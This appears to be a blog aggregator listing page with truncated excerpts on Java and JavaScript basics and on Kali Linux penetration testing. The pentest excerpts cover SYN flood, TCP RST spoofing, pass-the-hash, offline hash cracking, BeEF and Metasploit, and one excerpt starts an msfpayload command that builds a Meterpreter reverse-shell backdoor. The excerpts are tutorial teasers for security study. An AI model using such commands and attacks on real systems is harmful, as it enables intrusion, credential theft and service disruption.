台部落the_

這是一篇對java接口思想的總結，原文鏈接java的接口及實例一、定義 Java接口（Interface），是一系列方法的聲明，是一些方法特徵的集合，一個接口只有方法的特徵沒有方法的實現，因此這些方法可以在不同的地方被不同的類實

2020-06-23 12:46:48

TCP SYN Flood，又稱SYN洪泛攻擊，是目前最爲有效和流行的一種拒絕服務攻擊形式。它利用TCP三次握手協議的缺陷，向目標主機發送大量的僞造源地址的SYN連接請求，消耗目標主機的連接隊列資源，從而不能正常爲用戶提供服務。

2020-06-23 12:46:46

前面的話　　javascript裏的關係又多又亂。作用域鏈是一種單向的鏈式關係，還算簡單清晰；this機制的調用關係，稍微有些複雜；而關於原型，則是prototype、proto和constructor的三角關係。本文先用一張圖

2020-06-23 12:46:46

一直以來總覺得js的數據類型挺簡單的，沒有系統的學習過。但直到昨天在控制檯下打了個undefined == null ，電腦竟然返回了個true。於是自己在書上翻了翻這方面的知識點，發現坑還真是不少，有很多令人迷惑但卻技術上正確的

2020-02-20 13:34:01

嚴格相等運算符 === 簡單說明使用三個等號(===)的判斷規則：（1）如果類型不同，就一定不相等（2）如果兩個都是數值，並且是同一個值，那麼相等；如果其中至少一個是NaN，那麼不相等。（判斷一個值是否是NaN，只能使用i

2020-02-20 13:34:01

變量的傳遞分爲兩種，分別是值傳遞和引用傳遞。但是需要注意的一點是，在JavaScript中，只存在值傳遞，而不存在引用傳遞！！！這點非常容易迷惑人，於是總結如下：先看例子 function changeStuff(a, b,

2020-02-20 13:34:01

在線密碼攻擊在滲透測試中很重要，但對於測試過程中得到的哈希，加密數據，又需要離線破解工具輔助解決 Creddump套件 kali下離線攻擊工具中的Cache-dump，lsadump，pwdump，均爲creddump套件，的一

2020-02-20 13:34:01

對於字符串，其對象的引用都是存儲在棧中的，如果是編譯期已經創建好(直接用雙引號定義的)的就存儲在常量池中，如果是運行期（new出來的）才能確定的就存儲在堆中。對於equals相等的字符串，在常量池中永遠只有一份，在堆中有多份。

2020-02-20 13:34:00

使用示例： 1.生成Meterpreter後門命令語句如下，如果其中的IP爲kali攻擊機的IP地址，後面跟着的是參數。 msfpayload windows/meterpreter/reverse_tcp LHOST=2

2020-02-20 13:34:00

隨着無線網絡的興起，kali Linux下爲我們準備了豐富的無線網絡攻擊套件。由於無線網絡攻擊測試需要硬件設備支持，故對這些工具我們只在理論上加以介紹。 RFID/NPC工具與之相關的是IC卡的攻擊與破解，生活中形形色色的飯

2020-02-20 13:34:00

對XSS漏洞往往需要一個強大的框架支持，如網絡上的XSS平臺，在KALI下，Beef是一款絲毫不遜於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱，是一款專注於瀏覽器的滲透測試工具。打開beef beef-xss 默認用戶

2020-02-20 13:34:00

java的數據類型分爲兩種：基本類型和引用類型。引用類型分爲下面幾種：類類型（class，interface，enum，annotation）和數組類型點贊收藏分享文章舉報

2020-02-20 13:34:00

TCP RST攻擊也稱僞造TCP重置報文攻擊，它通過更改TCP協議頭的標誌位中的“reset”比特位（0變1），來關閉掉一個TCP會話連接。首先，A爲kali攻擊機，B爲靶機（win2000），C爲服務器（ubuntu）。其中

2020-02-20 13:34:00

passing the hash，中文一般翻譯爲hash傳遞攻擊，在windows系統中，系統通常不會存儲用戶登錄密碼，而是存儲密碼的哈希值，在我們遠程登錄系統的時候，實際上向遠程傳遞的就是密碼的hash值。當攻擊者獲取了存儲在計

2020-02-20 13:34:00

Metasploit在滲透測試中經常被用到，實際上這套軟件包括了很多工具，這些工具組成了一個完整的攻擊框架。他們或許在滲透測試中的每一方面都不能稱爲最好用的工具，但組合起來的框架卻讓它變得強大。 1.啓動服務：在kali中使用m

2020-02-20 13:34:00